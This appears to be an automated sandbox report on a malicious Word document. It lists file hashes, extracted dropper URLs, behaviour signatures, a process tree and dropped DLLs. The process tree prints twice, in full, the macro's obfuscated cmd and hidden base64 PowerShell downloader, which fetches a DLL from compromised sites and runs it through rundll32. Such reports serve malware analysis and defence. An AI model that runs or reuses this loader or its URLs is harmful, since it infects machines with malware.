Analysis

  • max time kernel
    72s
  • max time network
    113s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    14-01-2021 10:08

General

  • Target

    ARC_H535.doc

  • Size

    167KB

  • MD5

    265eac00afa62c7e92da8988d51ae7da

  • SHA1

    2d341415c447553e9deb2a594b0ec988293c8313

  • SHA256

    5eb02656c9d0f774760331a9af55e93a774b09ceaf654a1f199ab800c8a00c50

  • SHA512

    96725f1869b1b2643a319211401cb5fca9b27af39bc22bc81d5b578482c0dc42376e974f36da8d1399e347cb83e8c7329453ce889ea4e12f8fecf08a49d09ed1

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://transfersuvan.com/wp-admin/yhUw0GU/

exe.dropper

http://equipamentosmix.com/1/TRM/

exe.dropper

http://vedavacademy.com/wp-admin/7BHbH/

exe.dropper

http://lezz-etci.com/wp-content/mXxP/

exe.dropper

https://lapiramideopticas.com/tesla-powerwall-ok3h2/kmJ/

exe.dropper

http://aryasamajmandirkanpur.com/cgi-bin/VcJK/

exe.dropper

http://music.mnahid.com/wp-admin/kCGrt8/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Loads dropped DLL 4 IoCs
  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ARC_H535.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1204
  • C:\Windows\system32\cmd.exe
    cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAHMAZQB0ACAAIAA5AFoAagAxAEkAeAAgACAAKAAgACAAWwBUAFkAUABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMAB9AHsAMQB9AHsAMwB9ACIALQBmACAAJwBpAFIARQBjACcALAAnAHQAJwAsACcAZAAnACwAJwBvAHIAeQAnACwAJwBzAHkAUwBUAGUAbQAuAEkAbwAuACcAKQApACAAOwAgACAAIAAgAFMARQB0AC0AaQBUAGUAbQAgACAAVgBBAFIASQBhAEIATABlADoANgBoAHcAIAAoAFsAVAB5AFAARQBdACgAIgB7ADgAfQB7ADUAfQB7ADAAfQB7ADEAfQB7ADQAfQB7ADYAfQB7ADcAfQB7ADIAfQB7ADMAfQAiACAALQBGACcAZQBNAC4AbgBlAHQALgBzACcALAAnAGUAcgBWACcALAAnAGkATgB0AE0AYQBuAGEARwAnACwAJwBFAFIAJwAsACcASQAnACwAJwB0ACcALAAnAEMAZQAnACwAJwBwAE8AJwAsACcAcwB5AFMAJwApACAAKQAgACAAOwAkAEsAdgBpAGQAegBvADEAPQAkAFAAMQA1AEwAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFUAXwAzAEYAOwAkAEQANAA2AEQAPQAoACcAVwAnACsAKAAnAF8AOAAnACsAJwBRACcAKQApADsAIAAoACAAZwBFAFQALQBWAEEAUgBJAGEAQgBMAEUAIAAgADkAWgBKADEAaQBYACAALQBWAGEATABVAGUAbwBuAEwAWQApADoAOgAiAEMAUgBlAEEAVABgAGUARABJAHIAZQBgAEMAdABvAGAAUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwBjAEYAJwArACcAbQAnACkAKwAnAEUAJwArACgAJwBjACcAKwAnAHIAcgAnACkAKwAoACcAZwBzACcAKwAnAG0AYwAnACkAKwAoACcARgBtACcAKwAnAEQAeQAnACkAKwAnAHkAJwArACgAJwAzADcAJwArACcAMwBkAGMAJwApACsAJwBGAG0AJwApAC4AIgByAGAAZQBgAHAAbABhAEMAZQAiACgAKAAnAGMAJwArACcARgBtACcAKQAsAFsAUwB0AFIAaQBOAEcAXQBbAEMASABhAHIAXQA5ADIAKQApACkAOwAkAE0AMwBfAFQAPQAoACgAJwBYACcAKwAnADYAMgAnACkAKwAnAEcAJwApADsAIAAoAGcAZQB0AC0AdgBhAFIAaQBhAEIATABlACAAIAA2AGgAdwAgACAALQBWAEEATAApADoAOgAiAFMAYABlAGAAYwB1AGAAUgBgAEkAdAB5AFAAcgBvAHQAbwBjAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQARgA4ADYAVAA9ACgAKAAnAFIAXwAnACsAJwAzACcAKQArACcARgAnACkAOwAkAEYAMAAzAHYANQA4AHQAIAA9ACAAKAAnAEQAJwArACgAJwAzADQAJwArACcAQQAnACkAKQA7ACQAQgA1AF8AVwA9ACgAJwBVACcAKwAoACcAMwAnACsAJwAyAEgAJwApACkAOwAkAEcAegBiADQANwA5ADEAPQAkAEgATwBNAEUAKwAoACgAKAAnAEQAZQAnACsAJwBYACcAKQArACcARQBjACcAKwAoACcAcgByAGcAcwAnACsAJwBtACcAKQArACgAJwBEAGUAJwArACcAWABEAHkAeQAzACcAKQArACcANwAnACsAKAAnADMAJwArACcAZABEACcAKQArACcAZQBYACcAKQAuACIAUgBFAGAAcABsAEEAYABDAGUAIgAoACgAWwBDAEgAQQBSAF0ANgA4ACsAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQA4ADgAKQAsAFsAUwB0AFIASQBOAEcAXQBbAEMASABBAFIAXQA5ADIAKQApACsAJABGADAAMwB2ADUAOAB0ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABKADEAOABVAD0AKAAnAEkAJwArACgAJwA5AF8AJwArACcATAAnACkAKQA7ACQATABrAGgAeABvADkAbwA9ACgAJwBBACcAKwAnAF0AJwArACgAJwBbAHEAWwAnACsAJwBEADoALwAvAHQAcgAnACkAKwAnAGEAJwArACcAbgBzACcAKwAoACcAZgAnACsAJwBlAHIAcwB1AHYAJwArACcAYQAnACkAKwAnAG4ALgAnACsAJwBjACcAKwAoACcAbwBtACcAKwAnAC8AJwApACsAJwB3AHAAJwArACgAJwAtAGEAJwArACcAZABtACcAKQArACgAJwBpAG4ALwB5AGgAVQAnACsAJwB3ADAAJwArACcARwBVACcAKQArACcALwBAACcAKwAoACcAQQBdAFsAJwArACcAcQBbAEQAJwArACcAOgAvAC8AZQAnACsAJwBxAHUAaQAnACsAJwBwACcAKwAnAGEAbQBlAG4AdAAnACkAKwAoACcAbwBzACcAKwAnAG0AJwArACcAaQB4AC4AYwAnACkAKwAnAG8AJwArACgAJwBtAC8AMQAnACsAJwAvAFQAJwArACcAUgBNACcAKQArACcALwBAACcAKwAnAEEAJwArACcAXQAnACsAJwBbACcAKwAoACcAcQBbACcAKwAnAEQAOgAvACcAKQArACgAJwAvACcAKwAnAHYAZQAnACkAKwAoACcAZAAnACsAJwBhAHYAYQBjACcAKQArACgAJwBhAGQAJwArACcAZQBtAHkALgAnACkAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AdwAnACsAJwBwAC0AYQAnACsAJwBkACcAKQArACcAbQAnACsAKAAnAGkAbgAvADcAQgAnACsAJwBIAGIASAAvACcAKwAnAEAAJwApACsAKAAnAEEAXQBbACcAKwAnAHEAJwApACsAJwBbACcAKwAoACcARAA6ACcAKwAnAC8AJwApACsAKAAnAC8AbAAnACsAJwBlACcAKQArACgAJwB6ACcAKwAnAHoALQAnACkAKwAoACcAZQB0AGMAaQAnACsAJwAuAGMAJwApACsAKAAnAG8AJwArACcAbQAvAHcAcAAtAGMAbwAnACkAKwAnAG4AdAAnACsAKAAnAGUAJwArACcAbgB0ACcAKQArACgAJwAvAG0AWAAnACsAJwB4ACcAKQArACgAJwBQACcAKwAnAC8AQABBACcAKQArACgAJwBdAFsAJwArACcAcQAnACkAKwAnAFsARAAnACsAJwBzACcAKwAoACcAOgAvAC8AbABhAHAAJwArACcAaQAnACkAKwAnAHIAJwArACcAYQBtACcAKwAnAGkAZAAnACsAJwBlAG8AJwArACcAcAAnACsAJwB0ACcAKwAoACcAaQBjACcAKwAnAGEAJwApACsAJwBzAC4AJwArACgAJwBjAG8AJwArACcAbQAnACkAKwAnAC8AJwArACcAdABlACcAKwAoACcAcwAnACsAJwBsAGEAJwApACsAKAAnAC0AJwArACcAcABvACcAKQArACgAJwB3ACcAKwAnAGUAJwArACcAcgB3ACcAKwAnAGEAbABsAC0AbwBrADMAJwApACsAKAAnAGgAMgAnACsAJwAvACcAKQArACcAawBtACcAKwAnAEoALwAnACsAJwBAACcAKwAoACcAQQBdAFsAcQAnACsAJwBbACcAKQArACcARAAnACsAKAAnADoALwAnACsAJwAvACcAKQArACcAYQAnACsAJwByACcAKwAoACcAeQAnACsAJwBhAHMAJwApACsAJwBhACcAKwAnAG0AYQAnACsAKAAnAGoAbQBhAG4AZABpAHIAawAnACsAJwBhAG4AcAAnACsAJwB1AHIALgBjACcAKQArACgAJwBvAG0AJwArACcALwAnACkAKwAoACcAYwBnACcAKwAnAGkAJwArACcALQBiAGkAbgAvAFYAYwBKACcAKQArACcASwAnACsAJwAvAEAAJwArACgAJwBBAF0AJwArACcAWwAnACkAKwAnAHEAJwArACcAWwBEACcAKwAoACcAOgAvAC8AJwArACcAbQAnACkAKwAnAHUAJwArACcAcwAnACsAJwBpAGMAJwArACgAJwAuAG0AJwArACcAbgBhACcAKQArACcAaABpACcAKwAnAGQALgAnACsAKAAnAGMAJwArACcAbwBtAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAZAAnACsAJwBtAGkAbgAnACsAJwAvAGsAQwAnACkAKwAnAEcAJwArACgAJwByAHQAOAAnACsAJwAvACcAKQApAC4AIgByAGUAUABMAGAAQQBjAEUAIgAoACgAKAAnAEEAJwArACcAXQBbACcAKQArACgAJwBxACcAKwAnAFsARAAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACgAJwBkAHMAJwArACgAJwBlACcAKwAnAHcAZgAnACkAKQAsACgAKAAnAHcAJwArACcAZQB2ACcAKQArACcAdwBlACcAKQApACwAKAAoACcAYQBlACcAKwAnAGYAJwApACsAJwBmACcAKQAsACgAJwBoACcAKwAoACcAdAB0ACcAKwAnAHAAJwApACkAKQBbADIAXQApAC4AIgBTAGAAUABsAGkAdAAiACgAJABOADkAOQBRACAAKwAgACQASwB2AGkAZAB6AG8AMQAgACsAIAAkAFcAOAA1AEcAKQA7ACQARwBfAF8ASwA9ACgAJwBOADYAJwArACcANABMACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQARAAyAGkAdQA2ADIAagAgAGkAbgAgACQATABrAGgAeABvADkAbwApAHsAdAByAHkAewAoACYAKAAnAE4AJwArACcAZQB3AC0ATwBiAGoAZQBjACcAKwAnAHQAJwApACAAUwBZAFMAVABFAE0ALgBOAGUAVAAuAFcAZQBiAEMATABJAGUATgB0ACkALgAiAEQATwBXAE4AYABsAG8AYABBAGQARgBJAGAAbABlACIAKAAkAEQAMgBpAHUANgAyAGoALAAgACQARwB6AGIANAA3ADkAMQApADsAJABBADYAMwBTAD0AKAAnAFAAJwArACgAJwA0ADYAJwArACcAWgAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABHAHoAYgA0ADcAOQAxACkALgAiAEwAZQBOAEcAYABUAEgAIgAgAC0AZwBlACAAMwAxADAANAAxACkAIAB7ACYAKAAnAHIAdQBuAGQAbAAnACsAJwBsADMAMgAnACkAIAAkAEcAegBiADQANwA5ADEALAAoACcAUwAnACsAKAAnAGgAbwB3ACcAKwAnAEQAaQAnACkAKwAoACcAYQAnACsAJwBsAG8AZwBBACcAKQApAC4AIgBUAE8AcwBUAGAAUgBgAGkATgBHACIAKAApADsAJABHADAAMgBWAD0AKAAnAFAAJwArACgAJwA1ADgAJwArACcAWAAnACkAKQA7AGIAcgBlAGEAawA7ACQAVAAwADcAVQA9ACgAJwBCADQAJwArACcAMwBUACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATQA2ADYAWAA9ACgAKAAnAFEAMQAnACsAJwA1ACcAKQArACcATwAnACkA
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1376
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:1508
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -w hidden -enc IAAgAHMAZQB0ACAAIAA5AFoAagAxAEkAeAAgACAAKAAgACAAWwBUAFkAUABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMAB9AHsAMQB9AHsAMwB9ACIALQBmACAAJwBpAFIARQBjACcALAAnAHQAJwAsACcAZAAnACwAJwBvAHIAeQAnACwAJwBzAHkAUwBUAGUAbQAuAEkAbwAuACcAKQApACAAOwAgACAAIAAgAFMARQB0AC0AaQBUAGUAbQAgACAAVgBBAFIASQBhAEIATABlADoANgBoAHcAIAAoAFsAVAB5AFAARQBdACgAIgB7ADgAfQB7ADUAfQB7ADAAfQB7ADEAfQB7ADQAfQB7ADYAfQB7ADcAfQB7ADIAfQB7ADMAfQAiACAALQBGACcAZQBNAC4AbgBlAHQALgBzACcALAAnAGUAcgBWACcALAAnAGkATgB0AE0AYQBuAGEARwAnACwAJwBFAFIAJwAsACcASQAnACwAJwB0ACcALAAnAEMAZQAnACwAJwBwAE8AJwAsACcAcwB5AFMAJwApACAAKQAgACAAOwAkAEsAdgBpAGQAegBvADEAPQAkAFAAMQA1AEwAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFUAXwAzAEYAOwAkAEQANAA2AEQAPQAoACcAVwAnACsAKAAnAF8AOAAnACsAJwBRACcAKQApADsAIAAoACAAZwBFAFQALQBWAEEAUgBJAGEAQgBMAEUAIAAgADkAWgBKADEAaQBYACAALQBWAGEATABVAGUAbwBuAEwAWQApADoAOgAiAEMAUgBlAEEAVABgAGUARABJAHIAZQBgAEMAdABvAGAAUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwBjAEYAJwArACcAbQAnACkAKwAnAEUAJwArACgAJwBjACcAKwAnAHIAcgAnACkAKwAoACcAZwBzACcAKwAnAG0AYwAnACkAKwAoACcARgBtACcAKwAnAEQAeQAnACkAKwAnAHkAJwArACgAJwAzADcAJwArACcAMwBkAGMAJwApACsAJwBGAG0AJwApAC4AIgByAGAAZQBgAHAAbABhAEMAZQAiACgAKAAnAGMAJwArACcARgBtACcAKQAsAFsAUwB0AFIAaQBOAEcAXQBbAEMASABhAHIAXQA5ADIAKQApACkAOwAkAE0AMwBfAFQAPQAoACgAJwBYACcAKwAnADYAMgAnACkAKwAnAEcAJwApADsAIAAoAGcAZQB0AC0AdgBhAFIAaQBhAEIATABlACAAIAA2AGgAdwAgACAALQBWAEEATAApADoAOgAiAFMAYABlAGAAYwB1AGAAUgBgAEkAdAB5AFAAcgBvAHQAbwBjAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQARgA4ADYAVAA9ACgAKAAnAFIAXwAnACsAJwAzACcAKQArACcARgAnACkAOwAkAEYAMAAzAHYANQA4AHQAIAA9ACAAKAAnAEQAJwArACgAJwAzADQAJwArACcAQQAnACkAKQA7ACQAQgA1AF8AVwA9ACgAJwBVACcAKwAoACcAMwAnACsAJwAyAEgAJwApACkAOwAkAEcAegBiADQANwA5ADEAPQAkAEgATwBNAEUAKwAoACgAKAAnAEQAZQAnACsAJwBYACcAKQArACcARQBjACcAKwAoACcAcgByAGcAcwAnACsAJwBtACcAKQArACgAJwBEAGUAJwArACcAWABEAHkAeQAzACcAKQArACcANwAnACsAKAAnADMAJwArACcAZABEACcAKQArACcAZQBYACcAKQAuACIAUgBFAGAAcABsAEEAYABDAGUAIgAoACgAWwBDAEgAQQBSAF0ANgA4ACsAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQA4ADgAKQAsAFsAUwB0AFIASQBOAEcAXQBbAEMASABBAFIAXQA5ADIAKQApACsAJABGADAAMwB2ADUAOAB0ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABKADEAOABVAD0AKAAnAEkAJwArACgAJwA5AF8AJwArACcATAAnACkAKQA7ACQATABrAGgAeABvADkAbwA9ACgAJwBBACcAKwAnAF0AJwArACgAJwBbAHEAWwAnACsAJwBEADoALwAvAHQAcgAnACkAKwAnAGEAJwArACcAbgBzACcAKwAoACcAZgAnACsAJwBlAHIAcwB1AHYAJwArACcAYQAnACkAKwAnAG4ALgAnACsAJwBjACcAKwAoACcAbwBtACcAKwAnAC8AJwApACsAJwB3AHAAJwArACgAJwAtAGEAJwArACcAZABtACcAKQArACgAJwBpAG4ALwB5AGgAVQAnACsAJwB3ADAAJwArACcARwBVACcAKQArACcALwBAACcAKwAoACcAQQBdAFsAJwArACcAcQBbAEQAJwArACcAOgAvAC8AZQAnACsAJwBxAHUAaQAnACsAJwBwACcAKwAnAGEAbQBlAG4AdAAnACkAKwAoACcAbwBzACcAKwAnAG0AJwArACcAaQB4AC4AYwAnACkAKwAnAG8AJwArACgAJwBtAC8AMQAnACsAJwAvAFQAJwArACcAUgBNACcAKQArACcALwBAACcAKwAnAEEAJwArACcAXQAnACsAJwBbACcAKwAoACcAcQBbACcAKwAnAEQAOgAvACcAKQArACgAJwAvACcAKwAnAHYAZQAnACkAKwAoACcAZAAnACsAJwBhAHYAYQBjACcAKQArACgAJwBhAGQAJwArACcAZQBtAHkALgAnACkAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AdwAnACsAJwBwAC0AYQAnACsAJwBkACcAKQArACcAbQAnACsAKAAnAGkAbgAvADcAQgAnACsAJwBIAGIASAAvACcAKwAnAEAAJwApACsAKAAnAEEAXQBbACcAKwAnAHEAJwApACsAJwBbACcAKwAoACcARAA6ACcAKwAnAC8AJwApACsAKAAnAC8AbAAnACsAJwBlACcAKQArACgAJwB6ACcAKwAnAHoALQAnACkAKwAoACcAZQB0AGMAaQAnACsAJwAuAGMAJwApACsAKAAnAG8AJwArACcAbQAvAHcAcAAtAGMAbwAnACkAKwAnAG4AdAAnACsAKAAnAGUAJwArACcAbgB0ACcAKQArACgAJwAvAG0AWAAnACsAJwB4ACcAKQArACgAJwBQACcAKwAnAC8AQABBACcAKQArACgAJwBdAFsAJwArACcAcQAnACkAKwAnAFsARAAnACsAJwBzACcAKwAoACcAOgAvAC8AbABhAHAAJwArACcAaQAnACkAKwAnAHIAJwArACcAYQBtACcAKwAnAGkAZAAnACsAJwBlAG8AJwArACcAcAAnACsAJwB0ACcAKwAoACcAaQBjACcAKwAnAGEAJwApACsAJwBzAC4AJwArACgAJwBjAG8AJwArACcAbQAnACkAKwAnAC8AJwArACcAdABlACcAKwAoACcAcwAnACsAJwBsAGEAJwApACsAKAAnAC0AJwArACcAcABvACcAKQArACgAJwB3ACcAKwAnAGUAJwArACcAcgB3ACcAKwAnAGEAbABsAC0AbwBrADMAJwApACsAKAAnAGgAMgAnACsAJwAvACcAKQArACcAawBtACcAKwAnAEoALwAnACsAJwBAACcAKwAoACcAQQBdAFsAcQAnACsAJwBbACcAKQArACcARAAnACsAKAAnADoALwAnACsAJwAvACcAKQArACcAYQAnACsAJwByACcAKwAoACcAeQAnACsAJwBhAHMAJwApACsAJwBhACcAKwAnAG0AYQAnACsAKAAnAGoAbQBhAG4AZABpAHIAawAnACsAJwBhAG4AcAAnACsAJwB1AHIALgBjACcAKQArACgAJwBvAG0AJwArACcALwAnACkAKwAoACcAYwBnACcAKwAnAGkAJwArACcALQBiAGkAbgAvAFYAYwBKACcAKQArACcASwAnACsAJwAvAEAAJwArACgAJwBBAF0AJwArACcAWwAnACkAKwAnAHEAJwArACcAWwBEACcAKwAoACcAOgAvAC8AJwArACcAbQAnACkAKwAnAHUAJwArACcAcwAnACsAJwBpAGMAJwArACgAJwAuAG0AJwArACcAbgBhACcAKQArACcAaABpACcAKwAnAGQALgAnACsAKAAnAGMAJwArACcAbwBtAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAZAAnACsAJwBtAGkAbgAnACsAJwAvAGsAQwAnACkAKwAnAEcAJwArACgAJwByAHQAOAAnACsAJwAvACcAKQApAC4AIgByAGUAUABMAGAAQQBjAEUAIgAoACgAKAAnAEEAJwArACcAXQBbACcAKQArACgAJwBxACcAKwAnAFsARAAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACgAJwBkAHMAJwArACgAJwBlACcAKwAnAHcAZgAnACkAKQAsACgAKAAnAHcAJwArACcAZQB2ACcAKQArACcAdwBlACcAKQApACwAKAAoACcAYQBlACcAKwAnAGYAJwApACsAJwBmACcAKQAsACgAJwBoACcAKwAoACcAdAB0ACcAKwAnAHAAJwApACkAKQBbADIAXQApAC4AIgBTAGAAUABsAGkAdAAiACgAJABOADkAOQBRACAAKwAgACQASwB2AGkAZAB6AG8AMQAgACsAIAAkAFcAOAA1AEcAKQA7ACQARwBfAF8ASwA9ACgAJwBOADYAJwArACcANABMACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQARAAyAGkAdQA2ADIAagAgAGkAbgAgACQATABrAGgAeABvADkAbwApAHsAdAByAHkAewAoACYAKAAnAE4AJwArACcAZQB3AC0ATwBiAGoAZQBjACcAKwAnAHQAJwApACAAUwBZAFMAVABFAE0ALgBOAGUAVAAuAFcAZQBiAEMATABJAGUATgB0ACkALgAiAEQATwBXAE4AYABsAG8AYABBAGQARgBJAGAAbABlACIAKAAkAEQAMgBpAHUANgAyAGoALAAgACQARwB6AGIANAA3ADkAMQApADsAJABBADYAMwBTAD0AKAAnAFAAJwArACgAJwA0ADYAJwArACcAWgAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABHAHoAYgA0ADcAOQAxACkALgAiAEwAZQBOAEcAYABUAEgAIgAgAC0AZwBlACAAMwAxADAANAAxACkAIAB7ACYAKAAnAHIAdQBuAGQAbAAnACsAJwBsADMAMgAnACkAIAAkAEcAegBiADQANwA5ADEALAAoACcAUwAnACsAKAAnAGgAbwB3ACcAKwAnAEQAaQAnACkAKwAoACcAYQAnACsAJwBsAG8AZwBBACcAKQApAC4AIgBUAE8AcwBUAGAAUgBgAGkATgBHACIAKAApADsAJABHADAAMgBWAD0AKAAnAFAAJwArACgAJwA1ADgAJwArACcAWAAnACkAKQA7AGIAcgBlAGEAawA7ACQAVAAwADcAVQA9ACgAJwBCADQAJwArACcAMwBUACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATQA2ADYAWAA9ACgAKAAnAFEAMQAnACsAJwA1ACcAKQArACcATwAnACkA
        2⤵
        • Blocklisted process makes network request
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:316
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Ecrrgsm\Dyy373d\D34A.dll ShowDialogA
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1928
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Ecrrgsm\Dyy373d\D34A.dll ShowDialogA
            4⤵
            • Loads dropped DLL
            • Drops file in System32 directory
            • Suspicious use of WriteProcessMemory
            PID:1252
            • C:\Windows\SysWOW64\rundll32.exe
              C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Khmkzpqzxngb\irykisgcgtd.wkh",ShowDialogA
              5⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              PID:1352

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\Ecrrgsm\Dyy373d\D34A.dll
      MD5

      860165c44027c5363bb61787189a5bd0

      SHA1

      9e10cfbea1a748dd1dd11d0d59728d98f1798775

      SHA256

      fee6c3695f83a6fa6aa5bc789429f5cb4d556e13f928ff884f1b0ae066cd8ee1

      SHA512

      2e5be349954fa4ae4646bffdae744358aef8e2421ef6ef9d75eeac0b246e96d8b62cccd2b7474d1d15e148b23bd64f12987c5c4e159232ec01cbe7a537384edf

    • \Users\Admin\Ecrrgsm\Dyy373d\D34A.dll
      MD5

      860165c44027c5363bb61787189a5bd0

      SHA1

      9e10cfbea1a748dd1dd11d0d59728d98f1798775

      SHA256

      fee6c3695f83a6fa6aa5bc789429f5cb4d556e13f928ff884f1b0ae066cd8ee1

      SHA512

      2e5be349954fa4ae4646bffdae744358aef8e2421ef6ef9d75eeac0b246e96d8b62cccd2b7474d1d15e148b23bd64f12987c5c4e159232ec01cbe7a537384edf

    • \Users\Admin\Ecrrgsm\Dyy373d\D34A.dll
      MD5

      860165c44027c5363bb61787189a5bd0

      SHA1

      9e10cfbea1a748dd1dd11d0d59728d98f1798775

      SHA256

      fee6c3695f83a6fa6aa5bc789429f5cb4d556e13f928ff884f1b0ae066cd8ee1

      SHA512

      2e5be349954fa4ae4646bffdae744358aef8e2421ef6ef9d75eeac0b246e96d8b62cccd2b7474d1d15e148b23bd64f12987c5c4e159232ec01cbe7a537384edf

    • \Users\Admin\Ecrrgsm\Dyy373d\D34A.dll
      MD5

      860165c44027c5363bb61787189a5bd0

      SHA1

      9e10cfbea1a748dd1dd11d0d59728d98f1798775

      SHA256

      fee6c3695f83a6fa6aa5bc789429f5cb4d556e13f928ff884f1b0ae066cd8ee1

      SHA512

      2e5be349954fa4ae4646bffdae744358aef8e2421ef6ef9d75eeac0b246e96d8b62cccd2b7474d1d15e148b23bd64f12987c5c4e159232ec01cbe7a537384edf

    • \Users\Admin\Ecrrgsm\Dyy373d\D34A.dll
      MD5

      860165c44027c5363bb61787189a5bd0

      SHA1

      9e10cfbea1a748dd1dd11d0d59728d98f1798775

      SHA256

      fee6c3695f83a6fa6aa5bc789429f5cb4d556e13f928ff884f1b0ae066cd8ee1

      SHA512

      2e5be349954fa4ae4646bffdae744358aef8e2421ef6ef9d75eeac0b246e96d8b62cccd2b7474d1d15e148b23bd64f12987c5c4e159232ec01cbe7a537384edf

    • memory/316-6-0x000000001AC70000-0x000000001AC71000-memory.dmp
      Filesize

      4KB

    • memory/316-8-0x0000000002610000-0x0000000002611000-memory.dmp
      Filesize

      4KB

    • memory/316-9-0x000000001B9D0000-0x000000001B9D1000-memory.dmp
      Filesize

      4KB

    • memory/316-10-0x000000001AB60000-0x000000001AB61000-memory.dmp
      Filesize

      4KB

    • memory/316-7-0x00000000025E0000-0x00000000025E1000-memory.dmp
      Filesize

      4KB

    • memory/316-5-0x0000000001F80000-0x0000000001F81000-memory.dmp
      Filesize

      4KB

    • memory/316-4-0x000007FEF4F40000-0x000007FEF592C000-memory.dmp
      Filesize

      9.9MB

    • memory/316-3-0x0000000000000000-mapping.dmp
    • memory/1252-13-0x0000000000000000-mapping.dmp
    • memory/1352-18-0x0000000000000000-mapping.dmp
    • memory/1508-2-0x0000000000000000-mapping.dmp
    • memory/1508-19-0x000007FEF7140000-0x000007FEF73BA000-memory.dmp
      Filesize

      2.5MB

    • memory/1928-11-0x0000000000000000-mapping.dmp